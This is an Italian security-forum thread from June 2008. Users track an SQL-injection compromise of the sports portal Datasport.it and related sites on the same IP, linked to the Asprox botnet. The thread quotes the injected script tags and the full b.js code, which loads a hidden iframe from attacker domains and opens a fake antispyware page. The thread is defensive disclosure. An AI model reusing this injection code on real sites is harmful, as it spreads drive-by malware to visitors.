Giovedì 5 gugno 2008

Nel momento in cui scrivo il sito Datasport.it,sezione news calcio serie A (http://www.datasport.it/news_categorie.aspx?cp=a), è stato ulteriormente violato: presenti redirect ai siti:
http://www.encode72.com/b.js
http://www.view89.com/b.js
http://www.exec51.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.win496.com/b.js
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

Ho già provveduto a segnalare la cosa a datasport.it(ore 10:05).
Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script

Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva.

Link (http://www.virustotal.com/analisis/941b13bb9084d7d0a6228033d05ac133) all'analisi dello script su virustotal.com
Contenuto dello script su datasport.it
<script src=http://www.view89.com/b.js></script><script src=http://www.encode72.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.win496.com/b.js></script></a></span></div>
Contentuto dello script in oggetto:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}
Il tutto dopo quanto era successo Lunedì 2 giugno come potete leggere qui (http://edetools.blogspot.com/2008/06/datasport-hacked.html) ...anche questo problema segnalato in quella stessa data senza aver ottenuto uno straccio di risposta ma cosa ben più grave senza che chi si occupa del portale non abbia provveduto a correre ai ripari nè per ripulire il codice delle varie sezioni del portale nè per eliminare eventuali falle nei software utilizzati
Seguiranno aggiornamenti

Questo il contenuto infetto della Homepage:
script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
altra porzione sulla medesima riga:
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
idem come sopra:
<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>
<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>
<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>


sembrerebbe che i link scritti nel codice con sql injection cambi a seconda della sezione che si consulta

dettagli:di tutti i siti in cui è stato fatto un defacement inserendo le scritte
hacked by RedRolix sari_seytan And LupuS Rebel Group NOWAR
datasport.it mi risulta essere l'unico che ha subito l'ondata di sql injection con redirect a domini esterni
Questo mi fa supporre che datasport.it abbia subito due attacchi da diversi autori

Sito Datasport Ora sono script pericolosi
Juninho85 mi segnala che il portale italiano di sport Datasport presenta segni di un nuovo attacco di hacking ma questa volta di gran lunga piu' pericoloso dell'attacco di qualche giorno fa'
In precedenza si era verificata la presenza di numerose pagine su dominio datasport.it che presentavano il messaggio “hacked by RedRolix .......” e concludendo il post scrivevo:
“........... l'analisi de codice sorgente delle pagine colpite non rivela altri problemi a parte la scritta di hacking il che fa pensare che si tratti solo di una azione dimostrativa come avviane quotidianamente su parecchi siti anche .IT ..............Rimane comunque la gravita' del fatto in quanto dimostra una vulnerabilita' dei siti o dei server che li ospitano che potrebbe essere sfruttata per azioni ben piu' pericolose. (redirect a malware, pagine con exploit ecc...) .......”
In effetti sta succedendo proprio questo e sia Datasport che altri domini sempre ad esso collega sul medesimo ip hostano adesso pericolosi scirpt che linkano a malware ma non solo
Ecco un report eseguito con webscanner:
dove si vede la grande quantita' di script presenti su varie url tutte collegate a datasport (questa volta nascosti nel codice e non visibili nel layout della pagina) e questo il sorgente di una pagina
Per quanto si riferisce al codice dello script
oltre al pericoloso link a pagina con explot abbiamo il link ad un sito antimalware fasullo che, ad aumentare il pericolo, se ce ne fosse bisogno, a differenza dei siti di rogue applications questa volta, anche lui, distribuisce malware e non semplice applicazione fasulla.
Questo il report VT
Quello che sorprende dell'attacco e' la grande quantita' di nomi diversi di pagine a cui puntano gli scripts e comunque e' quasi certo che datasport non sara' l'unico dominio attaccato ma sicuramente anche altri siti .IT subiranno medesima sorte.

A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"

Edgar :D

A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"

Edgar :D

mi trovi perfettamente d'accordo,come puoi leggere sopra...probabilmente c'è stato una sorta di passaparola tra malintenzionati...;)
se ti possibile sarebbe molto utile raccogliere l'insieme dei domini presenti nelle varie sezioni del portale in modo da poterli inserire in blocklist :)

Sembra che ora Datasport sia offiline
Forse provvederanno a bonificare il sito.
A me comunque risultavano questi script presenti sulle pagine

<script src=http://www.en-us18.com/b.js>
<script src=http://www.libid53.com/b.js>
<script src=http://www.rundll92.com/b.js>
<script src=http://www.redir94.com/b.js>
<script src=http://www.locale48.com/b.js>
<script src=http://www.err68.com/b.js>
<script src=http://www.sslput4.com/b.js>
<script src=http://www.exe94.com/b.js>
<script src=http://www.exec51.com/b.js>
<script src=http://www.win496.com/b.js>
<script src=http://www.sslnet72.com/b.js>

di cui alcuni presenti ad esempio sulla lista di malwaredomains
(img sul blog)

Edgar :D

http://edetools.blogspot.com/

A me risulta online, ma stanno pulendo a razzo :D

la sezione news serie A calcio è stata ripulita,come anche la homepage(che poi son le 2 pagine da noi segnalate)...sul resto delle sezioni non è cambiato nulla PER ORA

Giovedì 5 gugno 2008

[CUT]
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

[CUT]


E' l'asprox botnet e non il Sinowal (l' unica cosa in comune è che utilizzano lo stesso kit per exploit (Neosploit)).

Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar :D

Quando si dice che c'è del marcio in Serie A ;)...

Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar :D

è stata bonificata(vista con i miei occhi)e poi pare sia stata rimodificata
la sezione basket/homepage(anch'essa infettata in mattinata)risulta non disponibile
la sezione news calcio serie A è stata ripulita

Al momento , 11.22 PM Thai (6.22 PM Ita) la home datasport e' tornata pulita ma una scansione rileva ancora almeno una trentina di scripts sparsi su 4 pagine (due pagine su sportmoviestv )

Edgar

Nuovamente infetto :rolleyes: :muro:

Nuovamente infetto :rolleyes: :muro:

Gia, ma che cosa stanno combinando :muro:

Nuovamente infetto :rolleyes: :muro:

in quali pagine?io ora sto visualizzando le news calcio serie a e non vedo nulla...
la homepage del basket ormai non è più raggiungibili così come molte altre aree(chissà se per manutenzione o per altri motivi...) da diverse ore,mentre la home del portale risulta essere pulita
intanto la segnalazione dello script malevolo ad avira non è andato a buon fine,per loro è tutto ok!:asd:

Nell' HomePage del sito ci sono


http://www.sslnet72.com/b.js
http://www.view89.com/b.js

confermo
intanto su 213.156.44.204,IP in cui oltre a datasport.it si trovano altri 7 domini,risultano nella medesima situazione www.STEFANOLAVORI.COM e
www.DATABASKET.NET(facente parte sempre di datasport)

Questa mattina , ora thai, (le 3 AM del 6 giugno in Italia) ho riverificato il sito dtasport
Ci sono ancora alcune pagine con scripts per un totale di 176 presenze del codice
Ho messo un aggiornamento del report su blog
http://edetools.blogspot.com/

Per il fatto che dopo che era bonificato veniva di nuovo colpito penso che 'curassero' i sintomi dell'attacco (ripristinando qualche backup) ma non le cause... e quindi tutto ritornasse come prima.

Edgar :D

Ad una verifica eseguita nuovamnete dopo qualche ora (10.30 am in italia) s sembra che il numero di scripts presenti sia ancora abbastanza elevato.

Ci sono in totale , nelle pagine controllate, 267 scripts.
(report aggiornato sul blog)

Edgar

http://edetools.blogspot.com/

Nonostante datasport.IT sia stato completamente bonificato rimane sullo stesso ip il sito Sportmoiviestv.com
che risulta ancora compromesso da centinaia di scripts.
E' interessante notare che su questo sito c'e' una notevole presenza del link a bannerupd.com, a differenza degli altri siti compromessi dove questo nome di dominio era praticamente assente.
(img sul blog)

Tra l'altro cercando in rete riferimenti a bannerupd sono veramente pochi i siti attaccati, che presentano questo script al loro interno ed alcune pagine in rete che si occupano di Asprox botnet confermerebbero che si tratta di recente dominio “ More fresh Asprox domains - bannerupd.com .....”
Questo ad esempio un sito brasiliano che presenta riferimenti nella pagina a bannerupd:
(img sul blog)
Sulle stesse pagine di Sportmoviestv esiste anche uno script con link a banner82.com ma in misura minore.
(img sul blog)
Come nei recenti casi esaminati, bannerupd punta a pagina con script offuscato facente parte delle botnet Asprox che utilizza la tecnologia fastflux.

Edgar :D

http://edetools.blogspot.com/

lo script su bannerupd e sempre il b.js con i medesimi contenuti giusto,falso antispyware a parte?
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+8*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exe94.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

E' sempre. mi pare, del medesimo genere degli altri e punta sempre a pagine che sono hostate su asprox, con indirizzi IP che cambiano in continuazione.(fastflux)
Comunque fin che continueranno ad esserci siti facilmente bucabili come succede tutti i giorni (ho postato una news dove ci sono altri siti .it con pagine di hacking su server USA) mi sa' che la cosa e' destinata solo ad aumentare.


Edgar :D


http://edetools.blogspot.com/

<script language="javascript" type="text/javascript" src="http://sysid
72.com/b.js"></script>

link (http://www.virustotal.com/it/analisis/d81361aa2ac897da2f8662af7df7c968)
a oggi solo authentium e symantec hanno aggiunto la rilevazione dello script nelle proprie firme :rolleyes:
datasport è stato ripulito,Sportmoviestv.com ancora no

link (http://www.datasport.it/news_categorie.aspx?cp=a)
buon segno :asd: